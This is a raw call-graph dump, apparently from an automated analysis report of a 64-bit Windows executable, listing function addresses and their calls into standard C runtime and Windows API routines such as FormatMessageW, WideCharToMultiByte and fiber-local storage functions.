17575->17024 17577 7ff6aba46215 17576->17577 17578 7ff6aba432b3 17577->17578 17579 7ff6aba55e48 _get_daylight 11 API calls 17577->17579 17582 7ff6aba46780 17578->17582 17580 7ff6aba46222 17579->17580 17581 7ff6aba42020 87 API calls 17580->17581 17581->17578 19431 7ff6aba41450 17582->19431 19537 7ff6aba457a0 17650->19537 17670 7ff6aba562dc EnterCriticalSection 17663->17670 17672 7ff6aba42a7c GetModuleFileNameW 17671->17672 17672->17356 17672->17357 17674 7ff6aba4887f FindClose 17673->17674 17675 7ff6aba48892 17673->17675 17674->17675 17676 7ff6aba4bb10 _log10_special 8 API calls 17675->17676 17677 7ff6aba42ada 17676->17677 17677->17361 17677->17362 17679 7ff6aba4be10 17678->17679 17680 7ff6aba42330 GetCurrentProcessId 17679->17680 17713 7ff6aba41d50 17680->17713 17682 7ff6aba4237b 17717 7ff6aba55b18 17682->17717 17685 7ff6aba41d50 48 API calls 17686 7ff6aba423eb FormatMessageW 17685->17686 17688 7ff6aba42436 17686->17688 17689 7ff6aba42424 17686->17689 17735 7ff6aba41e00 17688->17735 17690 7ff6aba41d50 48 API calls 17689->17690 17690->17688 17693 7ff6aba4bb10 _log10_special 8 API calls 17694 7ff6aba42464 17693->17694 17694->17371 17696 7ff6aba42af0 17695->17696 17697 7ff6aba48900 GetFinalPathNameByHandleW CloseHandle 17695->17697 17696->17368 17696->17369 17697->17696 17699 7ff6aba41f54 17698->17699 17700 7ff6aba41d50 48 API calls 17699->17700 17701 7ff6aba41fa5 17700->17701 17702 7ff6aba55b18 48 API calls 17701->17702 17703 7ff6aba41fe3 17702->17703 17704 7ff6aba41e00 78 API calls 17703->17704 17705 7ff6aba42001 17704->17705 17706 7ff6aba4bb10 _log10_special 8 API calls 17705->17706 17707 7ff6aba42011 17706->17707 17707->17371 17709 7ff6aba48a2a WideCharToMultiByte 17708->17709 17710 7ff6aba48a55 17708->17710 17709->17710 17712 7ff6aba48a6b __std_exception_copy 17709->17712 17711 7ff6aba48a72 WideCharToMultiByte 17710->17711 17710->17712 17711->17712 17712->17370 17714 7ff6aba41d75 17713->17714 17715 7ff6aba55b18 48 API calls 17714->17715 17716 7ff6aba41d98 17715->17716 17716->17682 17721 7ff6aba55b72 17717->17721 17718 7ff6aba55b97 17719 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17718->17719 17723 7ff6aba55bc1 17719->17723 17720 7ff6aba55bd3 17739 7ff6aba52e08 17720->17739 17721->17718 17721->17720 17725 7ff6aba4bb10 _log10_special 8 API calls 17723->17725 17727 7ff6aba423bb 17725->17727 17726 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17726->17723 17727->17685 17728 7ff6aba55cb4 17728->17726 17729 7ff6aba55c89 17731 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17729->17731 17730 7ff6aba55cda 17730->17728 17733 7ff6aba55ce4 17730->17733 17731->17723 17732 7ff6aba55c80 17732->17728 17732->17729 17734 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17733->17734 17734->17723 17736 7ff6aba41e26 17735->17736 18107 7ff6aba557a0 17736->18107 17738 7ff6aba41e3c 17738->17693 17740 7ff6aba52e46 17739->17740 17741 7ff6aba52e36 17739->17741 17742 7ff6aba52e4f 17740->17742 17746 7ff6aba52e7d 17740->17746 17743 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17741->17743 17744 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17742->17744 17745 7ff6aba52e75 17743->17745 17744->17745 17745->17728 17745->17729 17745->17730 17745->17732 17746->17741 17746->17745 17750 7ff6aba54450 17746->17750 17783 7ff6aba535a0 17746->17783 17820 7ff6aba52390 17746->17820 17751 7ff6aba54492 17750->17751 17752 7ff6aba54503 17750->17752 17753 7ff6aba5452d 17751->17753 17754 7ff6aba54498 17751->17754 17755 7ff6aba5455c 17752->17755 17756 7ff6aba54508 17752->17756 17843 7ff6aba5132c 17753->17843 17757 7ff6aba544cc 17754->17757 17758 7ff6aba5449d 17754->17758 17762 7ff6aba54573 17755->17762 17764 7ff6aba54566 17755->17764 17765 7ff6aba5456b 17755->17765 17759 7ff6aba5450a 17756->17759 17760 7ff6aba5453d 17756->17760 17763 7ff6aba544a3 17757->17763 17757->17765 17758->17762 17758->17763 17771 7ff6aba54519 17759->17771 17775 7ff6aba544ac 17759->17775 17850 7ff6aba50f1c 17760->17850 17857 7ff6aba55158 17762->17857 17769 7ff6aba544de 17763->17769 17763->17775 17779 7ff6aba544c7 17763->17779 17764->17753 17764->17765 17781 7ff6aba5459c 17765->17781 17861 7ff6aba5173c 17765->17861 17769->17781 17833 7ff6aba54f40 17769->17833 17771->17753 17772 7ff6aba5451e 17771->17772 17772->17781 17839 7ff6aba55004 17772->17839 17774 7ff6aba4bb10 _log10_special 8 API calls 17777 7ff6aba54896 17774->17777 17775->17781 17823 7ff6aba54c04 17775->17823 17777->17746 17779->17781 17782 7ff6aba54788 17779->17782 17868 7ff6aba55270 17779->17868 17781->17774 17782->17781 17874 7ff6aba5fad0 17782->17874 17784 7ff6aba535c4 17783->17784 17785 7ff6aba535ae 17783->17785 17786 7ff6aba53604 17784->17786 17789 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17784->17789 17785->17786 17787 7ff6aba54492 17785->17787 17788 7ff6aba54503 17785->17788 17786->17746 17790 7ff6aba5452d 17787->17790 17791 7ff6aba54498 17787->17791 17792 7ff6aba5455c 17788->17792 17793 7ff6aba54508 17788->17793 17789->17786 17798 7ff6aba5132c 38 API calls 17790->17798 17794 7ff6aba544cc 17791->17794 17795 7ff6aba5449d 17791->17795 17799 7ff6aba54573 17792->17799 17802 7ff6aba54566 17792->17802 17803 7ff6aba5456b 17792->17803 17796 7ff6aba5450a 17793->17796 17797 7ff6aba5453d 17793->17797 17800 7ff6aba544a3 17794->17800 17794->17803 17795->17799 17795->17800 17801 7ff6aba544ac 17796->17801 17809 7ff6aba54519 17796->17809 17805 7ff6aba50f1c 38 API calls 17797->17805 17815 7ff6aba544c7 17798->17815 17804 7ff6aba55158 45 API calls 17799->17804 17800->17801 17807 7ff6aba544de 17800->17807 17800->17815 17806 7ff6aba54c04 47 API calls 17801->17806 17818 7ff6aba5459c 17801->17818 17802->17790 17802->17803 17808 7ff6aba5173c 38 API calls 17803->17808 17803->17818 17804->17815 17805->17815 17806->17815 17810 7ff6aba54f40 46 API calls 17807->17810 17807->17818 17808->17815 17809->17790 17811 7ff6aba5451e 17809->17811 17810->17815 17813 7ff6aba55004 37 API calls 17811->17813 17811->17818 17812 7ff6aba4bb10 _log10_special 8 API calls 17814 7ff6aba54896 17812->17814 17813->17815 17814->17746 17816 7ff6aba55270 45 API calls 17815->17816 17815->17818 17819 7ff6aba54788 17815->17819 17816->17819 17817 7ff6aba5fad0 46 API calls 17817->17819 17818->17812 17819->17817 17819->17818 18090 7ff6aba505a0 17820->18090 17824 7ff6aba54c2a 17823->17824 17886 7ff6aba50158 17824->17886 17829 7ff6aba55270 45 API calls 17830 7ff6aba54d6f 17829->17830 17830->17830 17831 7ff6aba55270 45 API calls 17830->17831 17832 7ff6aba54dfd 17830->17832 17831->17832 17832->17779 17834 7ff6aba54f75 17833->17834 17835 7ff6aba54f93 17834->17835 17837 7ff6aba55270 45 API calls 17834->17837 17838 7ff6aba54fba 17834->17838 17836 7ff6aba5fad0 46 API calls 17835->17836 17836->17838 17837->17835 17838->17779 17840 7ff6aba55025 17839->17840 17841 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17840->17841 17842 7ff6aba55056 17840->17842 17841->17842 17842->17779 17844 7ff6aba5135f 17843->17844 17845 7ff6aba5138e 17844->17845 17847 7ff6aba5144b 17844->17847 17849 7ff6aba513cb 17845->17849 18022 7ff6aba50200 17845->18022 17848 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17847->17848 17848->17849 17849->17779 17851 7ff6aba50f4f 17850->17851 17852 7ff6aba50f7e 17851->17852 17854 7ff6aba5103b 17851->17854 17853 7ff6aba50200 12 API calls 17852->17853 17856 7ff6aba50fbb 17852->17856 17853->17856 17855 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17854->17855 17855->17856 17856->17779 17858 7ff6aba5519b 17857->17858 17860 7ff6aba5519f __crtLCMapStringW 17858->17860 18030 7ff6aba551f4 17858->18030 17860->17779 17862 7ff6aba5176f 17861->17862 17863 7ff6aba5179e 17862->17863 17865 7ff6aba5185b 17862->17865 17864 7ff6aba50200 12 API calls 17863->17864 17867 7ff6aba517db 17863->17867 17864->17867 17866 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17865->17866 17866->17867 17867->17779 17869 7ff6aba55287 17868->17869 18034 7ff6aba5ea80 17869->18034 17875 7ff6aba5fb0f 17874->17875 17876 7ff6aba5fb01 17874->17876 17875->17782 17876->17875 17877 7ff6aba5fb2f 17876->17877 17878 7ff6aba55270 45 API calls 17876->17878 17879 7ff6aba5fb67 17877->17879 17880 7ff6aba5fb40 17877->17880 17878->17877 17879->17875 17882 7ff6aba5fbf2 17879->17882 17883 7ff6aba5fb91 17879->17883 18080 7ff6aba61310 17880->18080 17884 7ff6aba60b10 _fread_nolock MultiByteToWideChar 17882->17884 17883->17875 18083 7ff6aba60b10 17883->18083 17884->17875 17887 7ff6aba5018f 17886->17887 17888 7ff6aba5017e 17886->17888 17887->17888 17889 7ff6aba5e6c4 _fread_nolock 12 API calls 17887->17889 17894 7ff6aba5f638 17888->17894 17890 7ff6aba501bc 17889->17890 17891 7ff6aba501d0 17890->17891 17892 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17890->17892 17893 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17891->17893 17892->17891 17893->17888 17895 7ff6aba5f688 17894->17895 17896 7ff6aba5f655 17894->17896 17895->17896 17898 7ff6aba5f6ba 17895->17898 17897 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17896->17897 17907 7ff6aba54d4d 17897->17907 17904 7ff6aba5f7cd 17898->17904 17911 7ff6aba5f702 17898->17911 17899 7ff6aba5f8bf 17949 7ff6aba5eb24 17899->17949 17901 7ff6aba5f885 17942 7ff6aba5eebc 17901->17942 17903 7ff6aba5f854 17935 7ff6aba5f19c 17903->17935 17904->17899 17904->17901 17904->17903 17906 7ff6aba5f817 17904->17906 17908 7ff6aba5f80d 17904->17908 17925 7ff6aba5f3cc 17906->17925 17907->17829 17907->17830 17908->17901 17910 7ff6aba5f812 17908->17910 17910->17903 17910->17906 17911->17907 17916 7ff6aba5b3ac 17911->17916 17914 7ff6aba5b844 _isindst 17 API calls 17915 7ff6aba5f91c 17914->17915 17917 7ff6aba5b3b9 17916->17917 17918 7ff6aba5b3c3 17916->17918 17917->17918 17922 7ff6aba5b3de 17917->17922 17919 7ff6aba55e48 _get_daylight 11 API calls 17918->17919 17924 7ff6aba5b3ca 17919->17924 17920 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 17921 7ff6aba5b3d6 17920->17921 17921->17907 17921->17914 17922->17921 17923 7ff6aba55e48 _get_daylight 11 API calls 17922->17923 17923->17924 17924->17920 17958 7ff6aba6531c 17925->17958 17929 7ff6aba5f474 17930 7ff6aba5f4c9 17929->17930 17931 7ff6aba5f494 17929->17931 17934 7ff6aba5f478 17929->17934 18011 7ff6aba5efb8 17930->18011 18007 7ff6aba5f274 17931->18007 17934->17907 17936 7ff6aba6531c 38 API calls 17935->17936 17937 7ff6aba5f1e6 17936->17937 17938 7ff6aba64d64 37 API calls 17937->17938 17939 7ff6aba5f236 17938->17939 17940 7ff6aba5f23a 17939->17940 17941 7ff6aba5f274 45 API calls 17939->17941 17940->17907 17941->17940 17943 7ff6aba6531c 38 API calls 17942->17943 17944 7ff6aba5ef07 17943->17944 17945 7ff6aba64d64 37 API calls 17944->17945 17946 7ff6aba5ef5f 17945->17946 17947 7ff6aba5ef63 17946->17947 17948 7ff6aba5efb8 45 API calls 17946->17948 17947->17907 17948->17947 17950 7ff6aba5eb9c 17949->17950 17951 7ff6aba5eb69 17949->17951 17953 7ff6aba5ebb4 17950->17953 17955 7ff6aba5ec35 17950->17955 17952 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17951->17952 17957 7ff6aba5eb95 memcpy_s 17952->17957 17954 7ff6aba5eebc 46 API calls 17953->17954 17954->17957 17956 7ff6aba55270 45 API calls 17955->17956 17955->17957 17956->17957 17957->17907 17959 7ff6aba6536f fegetenv 17958->17959 17960 7ff6aba6909c 37 API calls 17959->17960 17963 7ff6aba653c2 17960->17963 17961 7ff6aba653ef 17965 7ff6aba5b3ac __std_exception_copy 37 API calls 17961->17965 17962 7ff6aba654b2 17964 7ff6aba6909c 37 API calls 17962->17964 17963->17962 17969 7ff6aba6548c 17963->17969 17970 7ff6aba653dd 17963->17970 17966 7ff6aba654dc 17964->17966 17968 7ff6aba6546d 17965->17968 17967 7ff6aba6909c 37 API calls 17966->17967 17971 7ff6aba654ed 17967->17971 17972 7ff6aba66594 17968->17972 17977 7ff6aba65475 17968->17977 17973 7ff6aba5b3ac __std_exception_copy 37 API calls 17969->17973 17970->17961 17970->17962 17974 7ff6aba69290 20 API calls 17971->17974 17975 7ff6aba5b844 _isindst 17 API calls 17972->17975 17973->17968 17985 7ff6aba65556 memcpy_s 17974->17985 17976 7ff6aba665a9 17975->17976 17978 7ff6aba4bb10 _log10_special 8 API calls 17977->17978 17979 7ff6aba5f419 17978->17979 18003 7ff6aba64d64 17979->18003 17980 7ff6aba658ff memcpy_s 17981 7ff6aba65c3f 17982 7ff6aba64e80 37 API calls 17981->17982 17990 7ff6aba66357 17982->17990 17983 7ff6aba65beb 17983->17981 17986 7ff6aba665ac memcpy_s 37 API calls 17983->17986 17984 7ff6aba65597 memcpy_s 17996 7ff6aba65edb memcpy_s 17984->17996 17999 7ff6aba659f3 memcpy_s 17984->17999 17985->17980 17985->17984 17987 7ff6aba55e48 _get_daylight 11 API calls 17985->17987 17986->17981 17988 7ff6aba659d0 17987->17988 17989 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 17988->17989 17989->17984 17991 7ff6aba665ac memcpy_s 37 API calls 17990->17991 18001 7ff6aba663b2 17990->18001 17991->18001 17992 7ff6aba66538 17993 7ff6aba6909c 37 API calls 17992->17993 17993->17977 17994 7ff6aba55e48 11 API calls _get_daylight 17994->17996 17995 7ff6aba55e48 11 API calls _get_daylight 17995->17999 17996->17981 17996->17983 17996->17994 18002 7ff6aba5b824 37 API calls _invalid_parameter_noinfo 17996->18002 17997 7ff6aba64e80 37 API calls 17997->18001 17998 7ff6aba5b824 37 API calls _invalid_parameter_noinfo 17998->17999 17999->17983 17999->17995 17999->17998 18000 7ff6aba665ac memcpy_s 37 API calls 18000->18001 18001->17992 18001->17997 18001->18000 18002->17996 18004 7ff6aba64d83 18003->18004 18005 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18004->18005 18006 7ff6aba64dae memcpy_s 18004->18006 18005->18006 18006->17929 18008 7ff6aba5f2a0 memcpy_s 18007->18008 18009 7ff6aba55270 45 API calls 18008->18009 18010 7ff6aba5f35a memcpy_s 18008->18010 18009->18010 18010->17934 18012 7ff6aba5eff3 18011->18012 18013 7ff6aba5f040 memcpy_s 18011->18013 18014 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18012->18014 18016 7ff6aba5f0ab 18013->18016 18018 7ff6aba55270 45 API calls 18013->18018 18015 7ff6aba5f01f 18014->18015 18015->17934 18017 7ff6aba5b3ac __std_exception_copy 37 API calls 18016->18017 18021 7ff6aba5f0ed memcpy_s 18017->18021 18018->18016 18019 7ff6aba5b844 _isindst 17 API calls 18020 7ff6aba5f198 18019->18020 18021->18019 18023 7ff6aba50226 18022->18023 18024 7ff6aba50237 18022->18024 18023->17849 18024->18023 18025 7ff6aba5e6c4 _fread_nolock 12 API calls 18024->18025 18026 7ff6aba50268 18025->18026 18027 7ff6aba5027c 18026->18027 18028 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18026->18028 18029 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18027->18029 18028->18027 18029->18023 18031 7ff6aba5521a 18030->18031 18032 7ff6aba55212 18030->18032 18031->17860 18033 7ff6aba55270 45 API calls 18032->18033 18033->18031 18035 7ff6aba5ea99 18034->18035 18036 7ff6aba552af 18034->18036 18035->18036 18042 7ff6aba64574 18035->18042 18038 7ff6aba5eaec 18036->18038 18039 7ff6aba552bf 18038->18039 18040 7ff6aba5eb05 18038->18040 18039->17782 18040->18039 18077 7ff6aba638c0 18040->18077 18054 7ff6aba5c050 GetLastError 18042->18054 18045 7ff6aba645ce 18045->18036 18055 7ff6aba5c074 FlsGetValue 18054->18055 18056 7ff6aba5c091 FlsSetValue 18054->18056 18057 7ff6aba5c08b 18055->18057 18073 7ff6aba5c081 18055->18073 18058 7ff6aba5c0a3 18056->18058 18056->18073 18057->18056 18060 7ff6aba5fe04 _get_daylight 11 API calls 18058->18060 18059 7ff6aba5c0fd SetLastError 18061 7ff6aba5c10a 18059->18061 18062 7ff6aba5c11d 18059->18062 18063 7ff6aba5c0b2 18060->18063 18061->18045 18076 7ff6aba61548 EnterCriticalSection 18061->18076 18064 7ff6aba5b40c __FrameHandler3::FrameUnwindToEmptyState 38 API calls 18062->18064 18065 7ff6aba5c0d0 FlsSetValue 18063->18065 18066 7ff6aba5c0c0 FlsSetValue 18063->18066 18067 7ff6aba5c122 18064->18067 18069 7ff6aba5c0dc FlsSetValue 18065->18069 18070 7ff6aba5c0ee 18065->18070 18068 7ff6aba5c0c9 18066->18068 18071 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18068->18071 18069->18068 18072 7ff6aba5bdfc _get_daylight 11 API calls 18070->18072 18071->18073 18074 7ff6aba5c0f6 18072->18074 18073->18059 18075 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18074->18075 18075->18059 18078 7ff6aba5c050 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18077->18078 18079 7ff6aba638c9 18078->18079 18086 7ff6aba67ff8 18080->18086 18085 7ff6aba60b19 MultiByteToWideChar 18083->18085 18089 7ff6aba6805c 18086->18089 18087 7ff6aba4bb10 _log10_special 8 API calls 18088 7ff6aba6132d 18087->18088 18088->17875 18089->18087 18091 7ff6aba505e7 18090->18091 18092 7ff6aba505d5 18090->18092 18095 7ff6aba505f5 18091->18095 18099 7ff6aba50631 18091->18099 18093 7ff6aba55e48 _get_daylight 11 API calls 18092->18093 18094 7ff6aba505da 18093->18094 18096 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18094->18096 18097 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18095->18097 18104 7ff6aba505e5 18096->18104 18097->18104 18098 7ff6aba509ad 18100 7ff6aba55e48 _get_daylight 11 API calls 18098->18100 18098->18104 18099->18098 18101 7ff6aba55e48 _get_daylight 11 API calls 18099->18101 18102 7ff6aba50c41 18100->18102 18103 7ff6aba509a2 18101->18103 18105 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18102->18105 18106 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18103->18106 18104->17746 18105->18104 18106->18098 18109 7ff6aba557ca 18107->18109 18108 7ff6aba55802 18110 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18108->18110 18109->18108 18111 7ff6aba55835 18109->18111 18113 7ff6aba5582b 18110->18113 18114 7ff6aba500d8 18111->18114 18113->17738 18121 7ff6aba562dc EnterCriticalSection 18114->18121 18123 7ff6aba4fc5c 18122->18123 18150 7ff6aba4f9bc 18123->18150 18125 7ff6aba4fc75 18125->17385 18162 7ff6aba4f914 18126->18162 18130 7ff6aba4be10 18129->18130 18131 7ff6aba42040 GetCurrentProcessId 18130->18131 18132 7ff6aba41c60 49 API calls 18131->18132 18133 7ff6aba4208b 18132->18133 18176 7ff6aba558c4 18133->18176 18137 7ff6aba420ec 18138 7ff6aba41c60 49 API calls 18137->18138 18139 7ff6aba42106 18138->18139 18216 7ff6aba41cc0 18139->18216 18142 7ff6aba4bb10 _log10_special 8 API calls 18143 7ff6aba42120 18142->18143 18143->17424 18145 7ff6aba4f671 18144->18145 18146 7ff6aba41b69 18144->18146 18147 7ff6aba55e48 _get_daylight 11 API calls 18145->18147 18146->17423 18146->17424 18148 7ff6aba4f676 18147->18148 18149 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18148->18149 18149->18146 18151 7ff6aba4fa26 18150->18151 18152 7ff6aba4f9e6 18150->18152 18151->18152 18154 7ff6aba4fa32 18151->18154 18153 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18152->18153 18155 7ff6aba4fa0d 18153->18155 18161 7ff6aba562dc EnterCriticalSection 18154->18161 18155->18125 18163 7ff6aba4f93e 18162->18163 18174 7ff6aba41a00 18162->18174 18164 7ff6aba4f98a 18163->18164 18165 7ff6aba4f94d memcpy_s 18163->18165 18163->18174 18175 7ff6aba562dc EnterCriticalSection 18164->18175 18167 7ff6aba55e48 _get_daylight 11 API calls 18165->18167 18169 7ff6aba4f962 18167->18169 18171 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18169->18171 18171->18174 18174->17393 18174->17394 18178 7ff6aba5591e 18176->18178 18177 7ff6aba55943 18180 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18177->18180 18178->18177 18179 7ff6aba5597f 18178->18179 18227 7ff6aba527b8 18179->18227 18182 7ff6aba5596d 18180->18182 18184 7ff6aba4bb10 _log10_special 8 API calls 18182->18184 18183 7ff6aba55a5c 18185 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18183->18185 18187 7ff6aba420ca 18184->18187 18185->18182 18194 7ff6aba560a0 18187->18194 18188 7ff6aba55a80 18188->18183 18191 7ff6aba55a8a 18188->18191 18189 7ff6aba55a31 18192 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18189->18192 18190 7ff6aba55a28 18190->18183 18190->18189 18193 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18191->18193 18192->18182 18193->18182 18195 7ff6aba5c1c8 _get_daylight 11 API calls 18194->18195 18196 7ff6aba560b7 18195->18196 18197 7ff6aba5fe04 _get_daylight 11 API calls 18196->18197 18199 7ff6aba560f7 18196->18199 18203 7ff6aba560bf 18196->18203 18198 7ff6aba560ec 18197->18198 18200 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18198->18200 18199->18203 18365 7ff6aba5fe8c 18199->18365 18200->18199 18203->18137 18204 7ff6aba5b844 _isindst 17 API calls 18205 7ff6aba5613c 18204->18205 18206 7ff6aba5fe04 _get_daylight 11 API calls 18205->18206 18207 7ff6aba56189 18206->18207 18208 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18207->18208 18209 7ff6aba56197 18208->18209 18210 7ff6aba5fe04 _get_daylight 11 API calls 18209->18210 18214 7ff6aba561c1 18209->18214 18211 7ff6aba561b3 18210->18211 18213 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18211->18213 18213->18214 18215 7ff6aba561ca 18214->18215 18374 7ff6aba602e0 18214->18374 18215->18137 18217 7ff6aba41ccc 18216->18217 18218 7ff6aba48950 2 API calls 18217->18218 18219 7ff6aba41cf4 18218->18219 18220 7ff6aba41d19 18219->18220 18221 7ff6aba41cfe 18219->18221 18389 7ff6aba41db0 18220->18389 18223 7ff6aba41e00 78 API calls 18221->18223 18224 7ff6aba41d17 18223->18224 18225 7ff6aba4bb10 _log10_special 8 API calls 18224->18225 18226 7ff6aba41d40 18225->18226 18226->18142 18228 7ff6aba527f6 18227->18228 18229 7ff6aba527e6 18227->18229 18230 7ff6aba5282d 18228->18230 18231 7ff6aba527ff 18228->18231 18232 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18229->18232 18230->18229 18234 7ff6aba52825 18230->18234 18235 7ff6aba55270 45 API calls 18230->18235 18237 7ff6aba52adc 18230->18237 18241 7ff6aba53b88 18230->18241 18267 7ff6aba53268 18230->18267 18297 7ff6aba52300 18230->18297 18233 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18231->18233 18232->18234 18233->18234 18234->18183 18234->18188 18234->18189 18234->18190 18235->18230 18239 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18237->18239 18239->18229 18242 7ff6aba53bca 18241->18242 18243 7ff6aba53c3d 18241->18243 18244 7ff6aba53c67 18242->18244 18245 7ff6aba53bd0 18242->18245 18246 7ff6aba53c97 18243->18246 18247 7ff6aba53c42 18243->18247 18314 7ff6aba51128 18244->18314 18252 7ff6aba53bd5 18245->18252 18256 7ff6aba53ca6 18245->18256 18246->18244 18246->18256 18265 7ff6aba53c00 18246->18265 18248 7ff6aba53c77 18247->18248 18249 7ff6aba53c44 18247->18249 18321 7ff6aba50d18 18248->18321 18251 7ff6aba53be5 18249->18251 18255 7ff6aba53c53 18249->18255 18266 7ff6aba53cd5 18251->18266 18300 7ff6aba549b0 18251->18300 18252->18251 18257 7ff6aba53c18 18252->18257 18252->18265 18255->18244 18259 7ff6aba53c58 18255->18259 18256->18266 18328 7ff6aba51538 18256->18328 18257->18266 18310 7ff6aba54e6c 18257->18310 18262 7ff6aba55004 37 API calls 18259->18262 18259->18266 18261 7ff6aba4bb10 _log10_special 8 API calls 18263 7ff6aba53f6b 18261->18263 18262->18265 18263->18230 18265->18266 18335 7ff6aba5f920 18265->18335 18266->18261 18268 7ff6aba53289 18267->18268 18269 7ff6aba53273 18267->18269 18270 7ff6aba532c7 18268->18270 18271 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18268->18271 18269->18270 18272 7ff6aba53bca 18269->18272 18273 7ff6aba53c3d 18269->18273 18270->18230 18271->18270 18274 7ff6aba53c67 18272->18274 18275 7ff6aba53bd0 18272->18275 18276 7ff6aba53c97 18273->18276 18277 7ff6aba53c42 18273->18277 18281 7ff6aba51128 38 API calls 18274->18281 18278 7ff6aba53bd5 18275->18278 18280 7ff6aba53ca6 18275->18280 18276->18274 18276->18280 18295 7ff6aba53c00 18276->18295 18279 7ff6aba53c77 18277->18279 18284 7ff6aba53c44 18277->18284 18286 7ff6aba53be5 18278->18286 18287 7ff6aba53c18 18278->18287 18278->18295 18282 7ff6aba50d18 38 API calls 18279->18282 18288 7ff6aba51538 38 API calls 18280->18288 18296 7ff6aba53cd5 18280->18296 18281->18295 18282->18295 18283 7ff6aba549b0 47 API calls 18283->18295 18285 7ff6aba53c53 18284->18285 18284->18286 18285->18274 18289 7ff6aba53c58 18285->18289 18286->18283 18286->18296 18290 7ff6aba54e6c 47 API calls 18287->18290 18287->18296 18288->18295 18292 7ff6aba55004 37 API calls 18289->18292 18289->18296 18290->18295 18291 7ff6aba4bb10 _log10_special 8 API calls 18293 7ff6aba53f6b 18291->18293 18292->18295 18293->18230 18294 7ff6aba5f920 47 API calls 18294->18295 18295->18294 18295->18296 18296->18291 18348 7ff6aba502ec 18297->18348 18301 7ff6aba549d2 18300->18301 18302 7ff6aba50158 12 API calls 18301->18302 18303 7ff6aba54a1a 18302->18303 18304 7ff6aba5f638 46 API calls 18303->18304 18305 7ff6aba54aed 18304->18305 18306 7ff6aba55270 45 API calls 18305->18306 18307 7ff6aba54b0f 18305->18307 18306->18307 18308 7ff6aba55270 45 API calls 18307->18308 18309 7ff6aba54b98 18307->18309 18308->18309 18309->18265 18311 7ff6aba54eec 18310->18311 18312 7ff6aba54e84 18310->18312 18311->18265 18312->18311 18313 7ff6aba5f920 47 API calls 18312->18313 18313->18311 18315 7ff6aba5115b 18314->18315 18316 7ff6aba5118a 18315->18316 18318 7ff6aba51247 18315->18318 18317 7ff6aba50158 12 API calls 18316->18317 18320 7ff6aba511c7 18316->18320 18317->18320 18319 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18318->18319 18319->18320 18320->18265 18322 7ff6aba50d4b 18321->18322 18323 7ff6aba50d7a 18322->18323 18325 7ff6aba50e37 18322->18325 18324 7ff6aba50158 12 API calls 18323->18324 18327 7ff6aba50db7 18323->18327 18324->18327 18326 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18325->18326 18326->18327 18327->18265 18329 7ff6aba5156b 18328->18329 18330 7ff6aba5159a 18329->18330 18332 7ff6aba51657 18329->18332 18331 7ff6aba50158 12 API calls 18330->18331 18334 7ff6aba515d7 18330->18334 18331->18334 18333 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18332->18333 18333->18334 18334->18265 18337 7ff6aba5f948 18335->18337 18336 7ff6aba5f98d 18340 7ff6aba5f976 memcpy_s 18336->18340 18341 7ff6aba5f94d memcpy_s 18336->18341 18345 7ff6aba61a58 18336->18345 18337->18336 18338 7ff6aba55270 45 API calls 18337->18338 18337->18340 18337->18341 18338->18336 18339 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18339->18341 18340->18339 18340->18341 18341->18265 18347 7ff6aba61a7c WideCharToMultiByte 18345->18347 18349 7ff6aba5032b 18348->18349 18350 7ff6aba50319 18348->18350 18353 7ff6aba50338 18349->18353 18356 7ff6aba50375 18349->18356 18351 7ff6aba55e48 _get_daylight 11 API calls 18350->18351 18352 7ff6aba5031e 18351->18352 18354 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18352->18354 18355 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18353->18355 18360 7ff6aba50329 18354->18360 18355->18360 18357 7ff6aba5041e 18356->18357 18358 7ff6aba55e48 _get_daylight 11 API calls 18356->18358 